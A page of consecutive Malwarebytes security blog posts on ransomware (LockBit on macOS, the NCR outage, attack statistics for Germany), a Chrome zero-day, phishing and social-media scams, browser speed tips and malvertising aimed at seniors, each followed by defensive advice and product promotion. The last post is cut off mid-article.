IT NEWS

News broke over the weekend that ransomware gang LockBit had begun targeting Mac users, triggering some concern in the Apple community. But have no fear: Apple security experts have dissected the ransomware, taking a deep dive into what it can and cannot do, and concluded that it is, actually, toothless.

“Yes, it can indeed run on Apple Silicon. That is basically the extent of its impact,” said Patrick Wardle (@patrickwardle), known macOS cybersecurity expert and founder of the non-profit, Objective-See. “macOS users have nothing to worry about.”

Here’s why.

The signature is invalid

Using a utility called codesign, Wardle saw that the payload’s signature value is “ad-hoc” compared to an Apple Developer ID. Because the signature is invalid, macOS won’t execute it.

If you’re brave enough to run the payload on your macOS, you’ll be met with this message, says Wardle. (Source: Objective-See)

The encryptor is likely a test file

Azim Khodjibaev (@AShukuhi), a security researcher at Cisco Talos, floated the theory to BleepingComputer that the encryptors designed for macOS were “meant as a test and were never intended for development in live cyberattacks.”

Wardle further confirmed this theory, stating the malware is far from complete. Indicators in the malware’s code suggest it’s Linux-based but compiled for macOS with basic configuration settings included. The code also shows its developers have yet to consider macOS’s TCC (Transparency, Consent, and Control) and SIP (System Integrity Protection), two security features meant to protect user files and folders.

With TCC and SIP present, the ransomware will only be able to encrypt a little, if at all.

The code is buggy and will crash

Laying further credence to the test file theory, Wardle found the macOS payload contains a buffer overflow, which will cause it to crash when executed.

No worries for now!

Apple users can rest easy knowing that this macOS ransomware, as it is now, will hardly impact anyone. However, as Wardle quickly pointed out, this may be different in future releases.

“The fact that a large ransomware gang has apparently set its sights on macOS should give us pause for concern and also catalyze conversations about detecting and preventing this (and future) samples in the first place,” he says in his blog.

With LockBit operating as a ransomware-as-a-service (RaaS) outfit, its ambition is to offer a range of ransomware. Currently, we have at least two available offerings: LockBit Black (based on BlackMatter’s code) and LockBit Green (based on Conti’s code). So expanding to target systems outside its repertoire is not only a logical move but also strategic.

“For most organizations, the main takeaway is Macs are probably safe, for now, but your Windows servers were always the prime target anyway,” says Malwarebytes Security Evangelist Mark Stockley. However, Mark warned:

“You’re only safe until you’re not, and there’s no timeline on getting this working. We won’t get a warning in advance, we’ll just hear (probably from LockBit itself) that an organization with lots of Macs has been turned over. So…what are you going to do if you have lots of Macs in your organization? Wait for the horse to bolt and then shut the door, or shut the door now?”

In an interview with BleepingComputer, LockBit’s public-facing representative LockBitSupp says the Mac encryptor is “actively being developed.”

LockBit was by far the most dominant ransomware in 2022, and hasn’t slowed down in 2023, which is why it’s one of the five threats you can’t afford to ignore in the Malwarebytes 2023 State of Malware report.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

On April 12, 2023, payment giant NCR reported it was looking into an issue with its point-of-sale (POS) systems that caused an outage, leaving customers unable to use the system.

The NCR Aloha POS systems are popular in hospitality services. Customers include Wendy’s, Chuck e Cheese, Café Rio, Leeann Chin, and FATZ Café. The NCR website claims the company helps over 100,000 restaurants run their operations. The outage primarily caused problems in the US but some European and Asia Pacific online ordering services were affected as well.

On April 13, NCR found that the root cause of the outage was the result of a ransomware incident. At this point it contacted customers, notified law enforcement, and initiated an investigation aided by third-party security experts.

In a statement on April 17, NCR reassured customers it was working hard to quickly restore functionality:

“We are committed to re-establishing secure access to the impacted Aloha and Counterpoint applications as quickly as possible. We are restoring impacted applications in a new secure environment. We will have further updates on the timeline for rebuilding this new environment, and we are targeting this week to bring these applications back online. We will also be contacting customers with a few key steps to access our new environment.”

Although NCR has released no specific information about the responsible ransomware group, it is rumored that ALPHV aka BlackCat was behind the attack after security researcher Dominic Alvieri found a post to that effect on the ALPHV leak site.

ALPHV has since removed the post in which they claimed to have stolen credentials belonging to NCR’s customers and threatened to publish these data if a ransom was not paid.

“We take a lot of credentials to your clients networks used to connect for Insight, Pulse, etc. We will give you this list after payment,”

The ransomware-as-a-service (RaaS) group ALPHV, also known as BlackCat or Noberus, is currently one of the most active. ALPHV was ranked #4 in our list of most prolific ransomware gangs last month.

ALPHV ransomware is used by affiliates who conduct individual attacks, breaching organizations using stolen credentials or by exploiting weaknesses in unpatched Microsoft Exchange servers. During the attacks, data is stolen and encrypted and the victim is asked to pay a ransom for both a decryption tool, and to prevent the stolen data from being leaked.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

When you are resting up from the physical part of your spring cleaning and you’re sitting behind your laptop or swiping left on your phone, why don’t you speed up your browsing experience with a few simple actions?

Let’s start with your browser, as that usually has the most impact on your perception of how “fast” your device is. In this post we will focus on the settings for Chrome since that is the browser with the biggest market share, but many browsers (like Edge) will have the same settings because they are based on the same Chromium codebase or they will have very similar settings (Firefox). We’ll also mention where you can find similar or the same settings in Safari, if available. These will be shown in red.

There may be slight differences in the methodology and screenshots, based on the type of device, the operating system, your language settings, and maybe even the manufacturer of your device, but the basics should be pretty much the same as the Windows-based methods and screenshots shown in this post.

Backups

Before we start let’s take some precautions to minimize the chance of having regrets about our actions afterwards.

1. Backup your currently open bookmarks: More (three dots) > Bookmarks > Bookmark all tabs… (Safari: In the Menu bar > select Bookmarks > then choose Add Bookmarks for these {number of open} Tabs.)

This will create a Set of bookmarks of the currently open tabs.

You will see a prompt where you can provide a name for this set of bookmarks. Something with the date in it would make it easier to find if you plan to do this more often.

Name that set and save it by clicking the Save button.

2. Exporting your data can be used to synchronize your browser between devices, but it can also be used as a backup for your data.

To create a backup click on More (three dots) > Settings > Turn on sync… Then log in to your Google account and access sync settings by clicking on Settings:

(Safari: click the Apple menu in the top left corner of your screen. Then click System Preferences > Click iCloud > select the checkbox next to Safari.)

Then select Manage what you sync and turn on Sync everything if it’s disabled, or make a custom selection of what you want to back up.

Once you’ve decided what to sync, it’s all automatically available across devices, as long as you sign in with the same Google account. When push comes to shove you can use this as a backup to restore your browser. If you were not using sync between devices before you started, you may want to turn it off once you are satisfied everything went well.

Speeding up

1. Check if you have the latest version of Google Chrome. Updates not only introduce new features, they also improve security and fix bugs.

Under More (three dots) > Help > About Google Chrome you can find what version you are on. If there is an update available, Chrome will download and install it. When it’s done you need to relaunch the browser to complete the update. 

Safari: Go to the Apple menu > System Settings > click on Software Update > if updates are available click Restart Now to install them. Once your macOS has updated, Safari will be up to date too.

2. Close some of those tabs that open every time you start your browser. Each site will take some time to load and that slows down your browser. Remember, you can create a set of sites that you need every day and the rest can be moved to your bookmarks so you can always find them.

Now you can start closing tabs and create a set of tabs that you would like to start your sessions with. Once all the unnecessary tabs are closed, click on More (three dots) > Settings > On startup. Select Open a specific page or set of pages.

Click on Use current pages and the currently open tabs will be the ones you see at the start of every browser session.

Safari: open the tabs you want to start with and use the method outlined under backups to create a set of bookmarks. Name that set of bookmarks, for example “Startup”. Go to Safari menu > Preferences > select Choose tabs folder from the New windows open with drop-down list. Select the folder of bookmarks (e.g. Startup) you created. Then, click Choose.

3. Under Performance > Memory Saver you can find another way to minimize the impact of your open tabs. When on, Chrome frees up memory from inactive tabs. This gives active tabs and other apps more computer resources and keeps Chrome fast. Your inactive tabs automatically become active again when you go back to them. 

4. Clean out some clutter you have picked up over time. Click on More (three dots) > Settings > Privacy and security. Click on Clear browsing data. This will open a prompt where you can select which data to clear. The top four are usually the ones you will want to clear. If you are using Chrome as a password manager you will certainly want to leave the fifth one unchecked.

Cookie warning: if you delete all your cookies, you will find that you will have to log in on several sites, so have your password manager ready or be selective about which cookies to delete. If you uncheck Cookies and other site data here, you can select which ones to delete if you click More (three dots) > Settings > Privacy and security > Cookies and other site data > See all site data and permissions. This allows you to go over a complete list and make more granular decisions. You can use the trash can symbol behind each site’s symbol to remove the site data and permissions.

Or use the dropdown arrow to have even more options.

Safari: Click the Safari menu > Clear History… > in the Clear field choose All History > click Clear History.

5. When it comes to browser extensions that you only use occasionally, you might consider disabling them until you need them. And if you no longer use them at all, remove them. Depending on the type of extension, the difference in surfing speed can be noticeable.

Click More (three dots) > Settings > Extensions to see an overview of the currently installed browser extensions.

The one(s) with the slide to the right (showing blue) are enabled and the one(s) with the slider to the left (showing in grey) are disabled. Any unwanted or no longer needed extensions can be removed by clicking on the Remove button in the extension’s tile.

Safari: Choose Safari > Settings > Extensions. To turn off an extension, deselect its checkbox. To uninstall an extension, select the extension and click the Uninstall button.

6. Preload your pages. Click More (three dots) > Settings > Privacy and security > Cookies and other site data. Here you can turn on Preload pages for faster browsing and searching.

7. Scan your device with Malwarebytes to see if any malware is lurking on it. Clearing up any malware on your system is a surefire way to speed it up. And it means you are safer, too!

If you came here looking for a resolution for an extremely slow browser and all of the above didn’t help, there could be other reasons at play. You can try resetting Chrome to default or even uninstall and re-install Chrome.

If a certain site isn’t working properly, you can also try opening the site in an Incognito window. Click More (three dots) and then New Incognito Window. Then copy and paste the URL of the problem site in the address bar and see if it works now. If it does solve the issue, then circle back to point 4 and remove all the cookies and data of the domain that the problem site belongs to.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Facebook users are advised to be wary of posts involving injured dogs receiving treatment at a vet surgery, or pets sitting next to people post-operation adorned with bandages and plaster casts.

The dog-themed missives all follow a similar format, with the primary change between them being the location the post is supposedly coming from. Here’s an example:

Hello. If anyone is looking for this sweet girl, found her lying on the side road in [hashtagged location name]. She was hit by a car in a hit and run incident.I took her to the vet. She is in a critical condition,sustained multiple fractures and on pain relief and oxygen.She is not chipped. I know someone is looking for her. Please bump this post to help me find the owner.

The images are randomly sourced, with many of the posts reusing the same photographs. Comments are often disabled.

Who is doing this? Well, in terms of the individual accounts on display, they’re a variety of personal accounts with little to no posting history. They’ve either been compromised first and then wiped clean of content, or they’re spam accounts with a recent creation date. The examples we’ve seen strongly suggest the latter.

As for posting tactics, they follow the standard Facebook spam tactic of being posted to local community / classified / real estate groups for maximum exposure. This is something which happens a lot, and was used to great effect in the “dead daughter / free PS5” campaign from the middle of last year.

What, specifically, are these bogus dog in the vet stories for? The scammers are banking on sympathetic engagement off the back of the heartstring tugging tale. With enough engagement, eyeballs, replies, anything at all of value…the posts switch to something else altogether.

This is exactly what was happening back in December with another Facebook scam. There, mostly freshly minted accounts posted up harrowing tales of missing toddlers dumped outside the gates of their homes. Eventually, they would become adverts promoting a variety of decidedly non-missing baby content.

Content switcheroo scams on Facebook are incredibly manipulative, and there’s a fair chance that such behaviour likely drives people away from engaging with genuine “missing baby / relative / injured pet” warnings down the line.

There are, however, a few things you can do to keep your Facebook house in order.

Avoiding Facebook hoaxes

• No replies allowed. Disabled replies can be a major warning flag. If you’re asking for help or giving a warning, why limit the number of people who can reply?
• If there’s a photograph, try performing a reverse image search. This is where you try to deduce the origin of the image. These scams are lazy; image reuse is rife, often going back many years. There are dedicated sites for this, such as TinEye. There, you either upload an image or provide a URL and TinEye will find any matches from across the internet. Most search engines also offer some reverse image search functionality, though quality of results will inevitably vary. It’s worth noting that sometimes scammers will flip an image (from left to right or vice versa) to try and fool reverse image searches. Deepfaked images will also typically not produce results.
• Copy / paste that text. Take the text of the suspicious post and search for that, too. You may well find a whole raft of cut and paste efforts across multiple social media portals.
• Freshly baked scammers. If the site the message or photo is posted to displays details about the person who posted it, see if it’ll let you observe things like account creation date or if the name on the account has been altered. A new account with no other content has likely been set up to scam people.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

In a recent security advisory, Google says it patched a high-severity zero-day security flaw in its Chrome browser—the first in 2023—currently being exploited in the wild by threat actors. The company urges all its Windows, Mac, and Linux users to update to version 112.0.5615.121 immediately, as this flaw is present in Chrome versions before this one. Updating your browser can be done manually or automatically.

If you use other Chromium-based browsers, you may need to update them as well.

The vulnerability, tracked as CVE-2023-2033, is exploitable when a user visits a malicious webpage using an unpatched Chrome browser. The page could run arbitrary code in the browser, potentially leading to your computing device being hijacked. Google knows an exploit code for this flaw already exists and is circulating in the wild.

CVE-2023-2033 is a type-confusion bug in V8, Google’s open-source JavaScript and WebAssembly engine. As with zero-day patch announcements, the company supplied little to no details on how attackers could exploit this flaw. However, we know that attacks on V8, although uncommon, are considered one of the most dangerous. Exploiting a weakness in V8 typically leads to a browser crashing.

“Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” says Google in the advisory. “We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.”

Google is giving all its Chrome users enough time to update to the latest version until technical details are released.

How to manually update Chrome

Google Chrome typically updates automatically. However, it’s worth double checking. To check if your browser is up to date:

• Click the three vertical dots at the upper right-hand side of the URL bar.
•  Select Help > About Google Chrome.

Simply doing this should trigger Chrome to update. Once done, the browser will ask you to relaunch. Click the button to confirm and complete the update process.

Google would never let users manually download and install a separate file to update Chrome. Scammers and threat actors have used this tactic many times in the past, and, for a time, it worked. Now and then, this tactic is adopted in a malicious campaign, to catch those who aren’t familiar with how Chrome works or how Google updates its products.

Stay safe!

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Last week, the IRS reminded taxpayers that Tax Day, April 18, is Tuesday this week. However, in some states like Alabama, California, and New York, the federal office extended the filing deadlines due to natural disasters. This is an excellent reason for scammers to keep launching tax scam campaigns even when tax is due tomorrow for most Americans.

Just a few weeks ago, we wrote about a fake IRS tax email carrying a malware payload: Emotet. Now, our Senior Director of Threat Intelligence, Jerome Segura, has found an email with the title “IRS Notice of intent to seize (Levy) Your Property or rights to property”, which was purportedly sent by “Tax IRS 152”.

The email, with an HTML file attachment, contains a short message:

Please note: [redacted]

<=> For information please continue to check here or use our free mobile=app. Updates status are made no more than once a day.

Opening the attached HTML file reveals a Microsoft email phishing page. According to Segura, stolen data is sent to a Telegram channel via a bot. So, avoid giving away your credentials, especially if your Microsoft email is tied to a business, if you don’t want scammers hijacking your account and using it for more nefarious purposes.

Avoiding tax scams

Here are some ways you can outsmart tax fraudsters and keep one step ahead of the phishing, malware, and social engineering attacks that come around every year during tax season.

• File early. One of the quickest ways to stumble into a trap is to leave filing your tax return until the last minute. That added pressure can mean responding to fake emails you otherwise would have ignored.
• Be careful around suspicious refunds. Tax agencies have a proper process for issuing refunds, as found on their websites. Some, like HMRC, are very clear that refunds are never issued by email. If in doubt, phone the tax office directly and ask if what you have is the real deal or a fake.
• Beware of fake bank portals. Some tax scams will ask you who you bank with, and then open up a phishing page for that bank. Always navigate directly to your banking website, click throughs and redirects typically spell danger.
• Avoid the pressure pitch. Tax scammers like to hurry you along to data theft and malware installs. Claims of only having 24 or 48 hours to file for a refund should be treated with skepticism. As with most solutions for these forms of social engineering, contact the tax entity directly.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are attacks where the victim opted not to pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Between April 2022 and March 2023, Germany was a globally significant target for ransomware gangs. During that period:

• It was the fourth most attacked country in the world, and the most attacked in the EU
• The construction sector was harder hit than in the USA, UK, or France
• LockBit and Black Basta accounted for 54% of known attacks
• Black Basta attacked targets in Germany far more often than in the UK or France

In August 2022, German power semiconductor manufacturer Semikron disclosed a ransomware attack that had partially encrypted its network, with the attackers claiming to have stolen 2TB of documents.

In the same month, German automotive parts powerhouse Continental was attacked by LockBit, which claimed to have stolen 40TB of files. The company broke off negotiations in late October, and the ransomware gang offered the data for sale or destruction for $50 million, the biggest known ransom of 2022, and the largest this author had seen until LockBIt’s equally outlandish request for $80 million from Royal Mail in early 2023.

A ransomware attack on German newspaper Heilbronner Stimme in October 2022 disrupted its printing systems, forcing the publication of a six-page emergency edition. The attack affected the entire Stimme Mediengruppe, including companies Pressedruck, Echo, and RegioMail, with Echo’s website and e-paper accessibility also compromised. Editor-in-chief Uwe Ralf Heer reported that a well-known cybercriminal group encrypted its systems and left ransom demands, but did not specify further.

In November 2022, the Vice Society ransomware gang claimed responsibility for a cyberattack on the University of Duisburg-Essen (UDE). The attackers leaked files including backup archives, financial documents, research papers, and student spreadsheets. On January 9, 2023, the university announced that due to extensive and complex damage caused by the attack, its entire IT infrastructure would need to be reconstructed.

Germany is a prime target

In the 12 months from April 2022 to March 2023, Germany was a globally significant target for ransomware, ranking as the fourth most attacked country by known attacks. It was the most attacked country in the EU, and the most attacked country where English isn’t the principle language.

Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first-and-foremost, a USA problem. It is not. The size and nature of the US economy means that it has many more targets for ransomware gangs than other countries in the top ten.

We can account for the difference in the size of countries’ economies by dividing the number of known ransomware attacks by a country’s nominal GDP, which gives us an approximate rate of attacks per $1T of economic output. On that basis, the difference between the countries in the top ten is far smaller than the total number of known attacks would suggest. The top ten most attacked countries all suffered between 15 and 66 known attacks per $1T of economic output.

The size of the countries in the top ten also vary enormously, and we can try to account for that by dividing known attacks by the size of each country’s population. On that measure, again, the differences between countries are much smaller than a simple count of known attacks suggests.

On a known attacks per capita basis, Germany sits in a cluster of four advanced European economies with nearly identical rates of attack. In all the variations of our top ten, English-speaking countries occupy at least three of the top five positions, and English-speaking countries with smaller populations and economies, like Canada and Australia, seem to suffer disproportionately.

The situation in Germany is far from good, it just isn’t quite as bad as in the very worst countries. By any measure, Germany is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs.

As in most countries, the German services sector is the most hard hit, accounting for 28% of attacks in the last 12 months, just slightly above the global average of 25%. In most respects, German industry sectors are attacked in roughly the proportions as they are in the UK and France, with some notable exceptions. There were no known attacks on German healthcare in the last 12 months (which, again, does not include unknown attacks), the country suffered fewer attacks on its legal services than either the UK or France, and it does not seem to have suffered the same problems France has had protecting its government sector, or the UK its education sector.

Where Germany suffers more than its neighbours is construction. Its 12% share of known attacks is double the global average, and notably higher than the USA (7%), UK (7%), and France (5%).

Black Basta’s hunting ground

In the UK, no individual ransomware was used in more than two known attacks on construction. In France one gang, LockBit, recorded three. In Germany, two different gangs recorded five known attacks against construction, accounting for a little over two thirds of the total. One of those gangs was LockBit, which is unsurprising given its position as by far the most used ransomware globally. The other was Black Basta, which recorded more attacks against German construction targets in 12 months than it did in the whole of France in the same period.

It seems Black Basta has an appetite for German targets. In the last 12 months it was the second most used ransomware in Germany, with 27 known attacks. In the same period it was busy in the UK with 10 attacks—but overshadowed by LockBit, Vice Society and others—it recorded just three attacks in France, where LockBit absolutely dominated.

In the last year, Black Basta and LockBit were the only ransomware that registered more than four known attacks in a month, with both going as high as eight. Between them, the two groups accounted for 54% of known attacks in Germany and largely determined whether the country would have a bad month at the hands of ransomware gangs or a terrible one.

Black Basta does not reinvent the wheel in the way it operates. Similar to other ransomware groups, attacks frequently begin with initial access gained through phishing attacks. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, CobaltStrike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaked data over its victims. The data is generally stolen using Rclone, which filters and copies specific files to a cloud service. After the data is exfiltratrated, the ransomware encrypts files with the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

Conclusions

In the last 12 months, Germany was a globally significant hunting ground for ransomware gangs, and the country with the fourth highest total of known attacks. Across the various industry sectors, construction was over represented, suffering a higher proportion of known attacks than the construction sectors in the USA, France, and the UK. Much like the education sector in the UK and the government sector in France, it should be alarming that, with an entire world of targets to choose from, it has attracted a disproportionate amount of attention.

In particular, the German construction sector suffered at the hands of LockBit and Black Basta, which displayed a liking for German targets of all kinds and was the second most used ransomware. Black Basta recorded considerably more attacks in Germany in the last year than in either the UK or France. In fact, the only country in the world to suffer more Black Basta attacks in the last twelve months than Germany was the USA.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Regular readers of our monthly ransomware review (read our April edition here) know that Ransomware-as-a-Service (RaaS) gangs have been making headlines globally with their disruptive attacks on organizations.

Sometimes, though, it’s not enough to merely know about of the problem.

In order to truly protect ourselves from RaaS gangs, we have to ‘peel back the onion’, so to speak, and get a closer look at how, exactly, they behave. If we know how RaaS gangs evade detection once in a network, for example, we may be able to kick them out before they can do any damage.

One of the most concerning behaviors we’ve observed from RaaS gangs is their use of Living off the Land (LOTL) attacks, where attackers leverage legitimate tools to evade detection, steal data, and more.

Let’s dive into the dangers of LOTL attacks in RaaS operations and provide guidance for under-resourced IT teams on how to detect and block such threats.

The deceptive nature of LOTL attacks

In an ideal world, IT teams whose organizations are under attack would have clear and direct evidence of the malicious activity.

For example, if unusual network connections are being made to remote IP addresses associated with known malicious actors, then there’s little doubt that you’re under attack—enabling IT to put a halt to the behavior early on.

But now imagine you’re diligently monitoring a network for any signs of suspicious activity. As you scan a seemingly endless stream of logs, searching for any anomalies that could signal trouble, you notice some activity from PowerShell, a versatile and legitimate scripting tool.

Script Block Logging records all blocks of code as they’re executed by PowerShell, which could you point to suspicious activity. Source.

Namely, there are scripts using commands that an attacker could use to steal data from the company’s network, but which also resembled legitimate administrative tasks used by IT professionals for various system administration tasks. Considering it’s regular business hours, you figure it’s part of a routine IT maintenance operation and move on.

But, lo and behold, it was a RaaS gang the whole time!

The attacker had studied the company’s environment and had a deep understanding of the tools and processes typically used by employees, and so they managed to avoid raising suspicion by blending in with typical PowerShell usage. By conducting the attack during normal business hours, the attackers also avoided any of the usual scrutiny that would come from moving across a network late at night. 

This is exactly why LOTL attacks are so dangerous: by mimicking normal behavior, LOTL attacks make it extremely difficult for IT teams and security solutions to detect any signs of malicious activities. Experienced analysts, however, might be able to pick up on subtle anomalies or patterns that indicate a LOTL attack, leveraging their expertise and deep understanding of system behaviors.

On the other hand, new or under-resourced teams may struggle to identify such attacks due to a lack of experience or insufficient tools, leaving them vulnerable to these stealthy threats.

5 LOTL tools used by ransomware gangs 

While attackers use a seemingly innumerable amount of legitimate tools for LOTL attacks, below are five of the most common ones we’ve seen the most active ransomware gangs using for their attacks.

Again, readers of our monthly ransomware review will recognize that each gang listed here are responsible for the lion’s share of yearly ransomware attacks.

LockBit, for example, topped our 2023 State of Malware Report as being responsible for more than 3 times more attacks than the next most active ransomware, ALPHV. In February 2023 alone, the LockBit group identified 126 victims onto its leak page.

Vice Society, on the other hand, is responsible for 70 percent of known attacks on UK education institutions.

Advice for IT teams

The four tips listed below, combined of cutting-edge technology and unique expertise, can greatly help IT teams uncover LOTL attacks:

1. Regularly monitor network traffic and logs

• Regularly analyze your network traffic for any unusual patterns or connections to known malicious IP addresses or domains associated with the use of tools like Chisel, Qakbot, or Cobalt Strike. 
• Enable logging on critical systems (firewalls, servers, and endpoint devices) and regularly review logs for unusual activities or signs of compromise.

2. Stay informed of the latest threat intelligence

• Leverage threat intelligence feeds to stay informed about new attack techniques, indicators of compromise (IOCs), and other relevant threat data.
• Use this data to fine-tune your security monitoring, detection, and response capabilities to identify and mitigate LOTL attacks.

3. Leverage behavioral analysis and anomaly detection

• Implement advanced monitoring tools that focus on detecting unusual user or system behavior rather than relying solely on known signatures or patterns.
• Machine learning and artificial intelligence can be leveraged to identify deviations from normal behavior, which might indicate an ongoing LOTL attack.

Malwarebytes EDR observes the behaviors of processes, registry, file system, and network activity on the endpoint using a heuristic algorithm looking for deviations. Here you can see all detection rules triggered in the suspicious activity and their mapping to MITRE ATT&CK.

4. Restrict the abuse of legitimate tools

• Focus on managing and controlling the use of legitimate tools and system features often exploited in LOTL attacks.
• Limit access to certain tools only to users who require them, monitoring their usage, and applying specific security policies to restrict potentially harmful actions.

In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper-hand against RaaS gangs that employ LOTL techniques.

24×7 security monitoring and threat hunting for your organization

Monitoring network traffic, enabling and reviewing logs, checking for anomaly detection, and implementing application control are essential steps for detecting and blocking malicious activity. However, these efforts often require around-the-clock coverage and deep cybersecurity expertise, which can be difficult for small and medium-sized organizations to maintain.

This is where Malwarebytes Managed Detection and Response (MDR) comes in.

stop hidden threats

Malwarebytes MDR analysts are experienced in detecting malicious use of legitimate tools and blocking attackers. They use their expertise to identify unusual patterns or connections to malicious IP addresses, domains, or unauthorized application usage related to the LOTL attacks conducted by the RaaS gangs.

By partnering with Malwarebytes MDR, businesses can enhance their security posture and gain peace of mind, knowing that a skilled team of security experts is working 24x7x365 to proactively detect and respond to potential threats. Find more MDR resources below!

• How to choose an MDR vendor: 6 questions to ask

• Is an outsourced SOC worth it? Looking at the ROI of MDR

• 3 ways MDR can drive business growth for MSPs

• Cyber threat hunting for SMBs: How MDR can help

The internet is full of Airbnb scams and accounts told by victims. But there is a twist in this latest story-gone-viral that is usually lacking in most narratives: The victim evens the score.

Airbnb host and scammer “Mr. Tyler” met his match when his would-be guest, TikTok user Olivia (@livvoogus), discovered his personal information after arriving at a property in Florida she could not get into. Her scam suspicions were confirmed that day.

In a TikTok clip detailing the events, she revealed she booked the place months before the New Year’s Eve music festival she and her friends planned to attend. The listing didn’t raise any red flags, and Mr. Tyler was a Superhost—described as “the best-rated, most experienced hosts” by Airbnb. The property also had good reviews.

Then things got sketchy while driving up to Jacksonville.

“The Airbnb host had sent us two different codes for the door and just stopped responding to any questions that we had, like where to park or how to get into the building—just kind of went ghost,” Olivia said. The neighbor came out and told them that a couple who came by last night also couldn’t get in, suggesting they were not the only ones Mr. Tyler scammed.

“The person who had lived there got evicted because, according to the lease, you’re not allowed to do Airbnbs out of the apartment, and he just never took the listing down,” she said.

Enraged, Olivia searched the internet for details about her host and eventually found his name, birthday, and parents’ address. She messaged Mr. Tyler to ask if she was supposed to meet him at his parents’ place, the address of which she included, because what he gave them was the incorrect address.

“This man called me back. So. Quickly,” Olivia enthused. What came next was also recorded and posted on TikTok. The clip was captioned, “when you travel long and far to find out your airbnb is fake and you go to extreme lengths to find out everything about the host and then call them to expose such information.”

In the end, Airbnb refunded Olivia, and she found a hotel room. The company paid a percentage of the cost for the following night, although Olivia believes Airbnb should’ve paid for it all. One TikTok commenter jokingly suggested that Olivia “send a bill to Tyler’s parents’ house”.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Knowing their audience is something scammers excel at, and for very good reason. This is particularly true for tech support scammers whose prime targets are seniors.

By understanding what retirees are searching for and abusing various online platforms, crooks can precisely go after the demographic they are interested in and lure them onto sites that they control.

We have been observing a specific malvertising campaign via Google ads aimed at seniors. The threat actor is creating hundreds of fake websites via the Weebly platform to host decoy content to fool search engines and crawlers while redirecting victims to a fake computer alert.

Based on our analysis, this particular scheme started sometime in the summer of 2022 but has drastically increased in prevalence in the past month. While we have been sharing details with affected parties privately for a few weeks, we are now exposing what we know. 

Popular search terms

Malvertising, or the use of ads to deliver malicious content, is not something new. Yet, over the years various threat actors have used it for different purposes.

It is a cost effective and efficient way to reach targets and then monetize those with a certain payload that can be anything from malicious software or plain old scams. But we don’t tend to hear about the latter as much because the impact of scams may be harder to quantify.

In talking to victims, you will often hear them describe that they were just looking up for something and clicked somewhere when all the sudden this or that happened.

As we saw an increase in our telemetry for tech support scam pages, we decided to replicate some of those searches and came up with keywords we thought the senior/retired audience might use often. In order to maximize our chances of identifying the campaign we used a real machine and prepared with a specific profile.

By far, anything related to recipes and cooking is a popular search query. We had previously identified another malvertising campaign using this same theme.

